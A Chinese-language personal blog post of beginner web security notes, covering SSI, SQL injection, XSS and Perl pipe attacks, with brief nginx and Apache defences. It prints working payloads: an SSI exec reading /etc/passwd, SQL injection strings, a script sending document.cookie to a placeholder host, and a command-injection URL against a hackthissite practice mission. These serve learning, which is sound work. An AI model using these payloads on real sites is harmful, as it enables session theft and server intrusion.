技术的路上奔跑

入门

0%

web攻防相关知识

发表于 更新于 分类于 Valine:
本文字数: 3.4k 阅读时长 ≈ 3 分钟

前言

记录一些攻防相关的web知识

学习网站

一、特定语言的攻防

1. shtml 可以执行SSI指令的前端页面

参考链接: HTML语言SSI指令语法

1.1. 攻

SSI指令

SSI(Server Side Include),当客户端访问这些shtml文件时,服务器端会把这些SHTML文件进行读取和解释,把SHTML文件中包含的SSI指令解释出来比如:你可以在SHTML文件中用SSI指令引用其他的html文件(#include ),服务器传送给客户端的文件,是已经解释的SHTML不会有SSI指令。它实现了HTML所没有的功能,就是可以实现了动态的SHTML,可以说是HTML的一种进化吧。像新浪的新闻系统就是这样的,新闻内容是固定的但它上面的广告和菜单等就是用#include引用进来的

目前,主要有以下几种用用途:

  1. 显示服务器端环境变量<#echo>
  2. 将文本内容直接插入到文档中<#include>
  3. 显示WEB文档相关信息<#flastmod #fsize> (如文件制作日期/大小等)
  4. 直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)
  5. 设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式)

高级SSI<XSSI>可设置变量使用if条件语句。

几种ssi指令实例和解析

#include

  • file: 文件名是一个相对路径,该路径相对于使用 #include 指令的文档所在的目录。被包含文件可以在同一级目录或其子目录中,但不能在上一级目录中。如表示当前目录下的的nav_head.htm文档,则为file=”nav_head.htm”。
  • virtual: 文件名是 Web 站点上的虚拟目录的完整路径。如表示相对于服务器文档根目录下hoyi目录下的nav_head.htm文件;则为file=”/hoyi/nav_head.htm”
1
2
<!--#include file="info.htm"-->
<!--#include virtual="文件名称"-->

#echo

1
2
3
4
5
6
7
8
本文档名称
<!--#echo var="DOCUMENT_NAME"-->

现在时间
<!--#echo var="DATE_LOCAL"-->

你的IP地址
<!--#echo var="REMOTE_ADDR"-->

#flastmod和#fsize

  • flastmod: 上次更改时间
  • fsize: 文件大小
1
2
<!--#flastmod file="文件名称"-->
<!--#fsize file="文件名称"-->

#exec

1
2
3
<!--#exec cmd="cat /etc/passwd"-->          将会显示密码文件
<!--#exec cmd="dir /b"-->                   将会显示当前目录下文件列表
<!--#exec cgi="/cgi-bin/gb.cgi"-->          将会执行CGI程序gb.cgi

1.2. 防

  • 需要在web服务端配置拦截

nginx配置

参考链接

需要的选项主要是以下三个:

  • ssi: 默认值off,启用ssi时将其设为on
  • ssi_silent_errors: 默认值off,开启后在处理SSI文件出错时不输出错误提示”[an error occurred while processing the directive]”。
  • ssi_types: 默认是text/html,所以如果需支持html,则不需要设置这句,如果需要支持shtml则需要设置:ssi_types text/shtml
    三个参数可以放在http, server或location作用域下。

2. sql

2.1. 攻

  • 一般对于sql注入,使用' or 1=1; #
  • '结束前面的参数引号
  • or 1=1令整个where失效
  • ;作为结束
  • #或者--将后续的字符串变成注释
  • order by [n]可以使用n(从1开始)来判断数据库一共有几列,大于某个n会报错,就证明有n列
  • select * from table1 union select 1,2,passwd,4,5 from table2: 使用union联表可以将另一个表的数据查出来拼接到整体数据中

3. js

3.1. 攻

(1) XSS跨站攻击

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

参考链接: 浅谈XSS攻击的那些事(附常用绕过姿势)

示例1: cookie劫持

  • 通过html注入实现窃取cookie
  • 如果页面直接将输入的值没有做转移展示在页面上,可以触发注入
  • 页面打开后,会立即请求http://xxx.xxx.xxx?[cookie_of_current],将当前页面的cookie发送给了一个网址
1
<script>window.location.href="http://xxx.xxx.xxx?"+document.cookie;</script>

示例2: 页面劫持

  • 通过html注入实现打开此网页自动跳转另一个页面
1
<script>window.location.href="http://xxx.xxx.xxx";</script>

示例3: 通过可植入代码的标签劫持

1
2
3
4
5
6
<!-- 图片加载失败做操作 -->
<img src='w.123' onerror='alert("hey!")'>
<!-- 鼠标移动做操作 -->
<a onmousemove="alert('hey')"></a>
<!-- 鼠标移动到块上做操作 -->
<div onmouseover="alert('hey')"></div>

4. perl

4.1. 攻

  • perl语言搭建的网站比较典型的是请求以xxx.pl结尾

  • 用open函数也可像命令行一样,打开和使用管道.

  • 语法为:

1
open(MYVAR, "mode");
  • mode有如下两种模式:
    • |command: 表示对MYVAR的输出相当于对command的输入.
    • command|: 表示command的输出作为对MYVAR的输入.

pl可以在服务器上执行命令,比如请求下面语句,就在服务器上执行了ls命令并输出

1
https://www.hackthissite.org/missions/realistic/11/page.pl?page=|ls|

二、特定软件的攻防

1. apache

1.1. htaccess

参考链接

1.1.1. 攻

1.1.2. 防

关闭htaccess功能,需要修改httpd.conf,设置AllowOverride none,将会忽略所有的.htaccess配置

三、特定系统的功防

四、通用知识

1. 防止谷歌抓取页面

  • 一般会在网站根目录放上一个robots.txt,里面定义了哪些目录不允许抓取

2. 内嵌网页的模式可以通过file:///path/to/file来访问磁盘

  • windows可以写成file:///C:/
  • linux可以写成file:///home/xxx